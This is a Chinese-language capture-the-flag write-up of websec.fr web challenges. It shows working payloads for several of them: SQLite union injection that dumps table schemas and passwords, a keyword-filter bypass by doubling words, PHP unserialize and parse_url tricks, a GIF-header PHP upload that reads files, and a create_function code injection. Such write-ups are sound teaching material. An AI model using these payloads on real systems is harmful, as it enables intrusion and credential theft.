国外的一个平台。看到队里师傅之前说有很多偏骚套路,正好BUU的题不会了,来做一下
babysteps
Level01
sqlite注入。
1 order by 2 #字段数为2 -1 union select 1,2 #1,2字段可回显 -1 union select 1,name from sqlite_master WHERE type='table' #得到表名users -1 union select 1,sql from sqlite_master WHERE type='table' #得到表结构CREATE TABLE users(id int(7), username varchar(255), password varchar(255)) -1 union select 1,password from users where id=1 #得到Flag
Level04
给了源码
<?php
include 'connect.php';
$sql = new SQL();
$sql->connect();
$sql->query = 'SELECT username FROM users WHERE id=';
if (isset ($_COOKIE['leet_hax0r'])) {
$sess_data = unserialize (base64_decode ($_COOKIE['leet_hax0r']));
try {
if (is_array($sess_data) && $sess_data['ip'] != $_SERVER['REMOTE_ADDR']) {
die('CANT HACK US!!!');
}
} catch(Exception $e) {
echo $e;
}
} else {
$cookie = base64_encode (serialize (array ( 'ip' => $_SERVER['REMOTE_ADDR']))) ;
setcookie ('leet_hax0r', $cookie, time () + (86400 * 30));
}
if (isset ($_REQUEST['id']) && is_numeric ($_REQUEST['id'])) {
try {
$sql->query .= $_REQUEST['id'];
} catch(Exception $e) {
echo ' Invalid query';
}
}
<?php
class SQL {
public $query = '';
public $conn;
public function __construct() {
}
public function connect() {
$this->conn = new SQLite3 ("database.db", SQLITE3_OPEN_READONLY);
}
public function SQL_query($query) {
$this->query = $query;
}
public function execute() {
return $this->conn->query ($this->query);
}
public function __destruct() {
if (!isset ($this->conn)) {
$this->connect ();
}
$ret = $this->execute ();
if (false !== $ret) {
while (false !== ($row = $ret->fetchArray (SQLITE3_ASSOC))) {
echo '';
}
}
}
}
审计后发现先过了一个cookie中的反序列化
然后进sql类。
构造一下就好了
替换cookie得到flag
Level17
数组一把梭
strcasecmp()函数遇到数组返回0,符合条件
Level25
<?php
parse_str(parse_url($_SERVER['REQUEST_URI'])['query'], $query);
foreach ($query as $k => $v) {
if (stripos($v, 'flag') !== false)
die('You are not allowed to get the flag, sorry :/');
}
include $_GET['page'] . '.txt';
问题在parse_url函数了,如果他访问一个不存在的地址就会返回false
payload:page=flag&:80
或者使用
http://websec.fr///level25/index.php?page=flag
Level28
<?php
if(isset($_POST['submit'])) {
if ($_FILES['flag_file']['size'] > 4096) {
die('Your file is too heavy.');
}
$filename = md5($_SERVER['REMOTE_ADDR']) . '.php';
$fp = fopen($_FILES['flag_file']['tmp_name'], 'r');
$flagfilecontent = fread($fp, filesize($_FILES['flag_file']['tmp_name']));
@fclose($fp);
file_put_contents($filename, $flagfilecontent);
if (md5_file($filename) === md5_file('flag.php') && $_POST['checksum'] == crc32($_POST['checksum'])) {
include($filename); // it contains the <code class="prettyprint" >$flag
variable
} else {
$flag = "Nope, $filename is not the right file, sorry.";
sleep(1); // Deter bruteforce
}
unlink($filename);
}
一个条件竞争的题
没复现成功
easy
Level02
和level01一样,只不过过滤了一些东西union, order, select, from, group, by.双写就行
-1 uniunionon seselectlect 1,password frfromom users where id=1
Level08
文件包含,会检测gif头
GIF89a
<?php var_dump(scandir('./')); ?>
发现了flag.txt
读一下就行
GIF89a
<?php var_dump(file_get_contents('flag.txt')); ?>
Level10
给了源码
<?php
if (isset ($_REQUEST['f']) && isset ($_REQUEST['hash'])) {
$file = $_REQUEST['f'];
$request = $_REQUEST['hash'];
$hash = substr (md5 ($flag . $file . $flag), 0, 8);
echo '';
if ($request == $hash) {
show_source ($file);
} else {
echo 'Permission denied!';
}
echo '';
}
发现会截取md5($flag.$file.$flag)的前八位,如果比较正确就输出文件
然后就有点没思路了,flag未知,爆破不太合理。。
看一眼WP吧!
好像是个弱类型的题
暂时还没复现出来
Level11
暂时不会。。
Level15
create_function函数漏洞
之前写过了 不细说了
;}echo($flag);//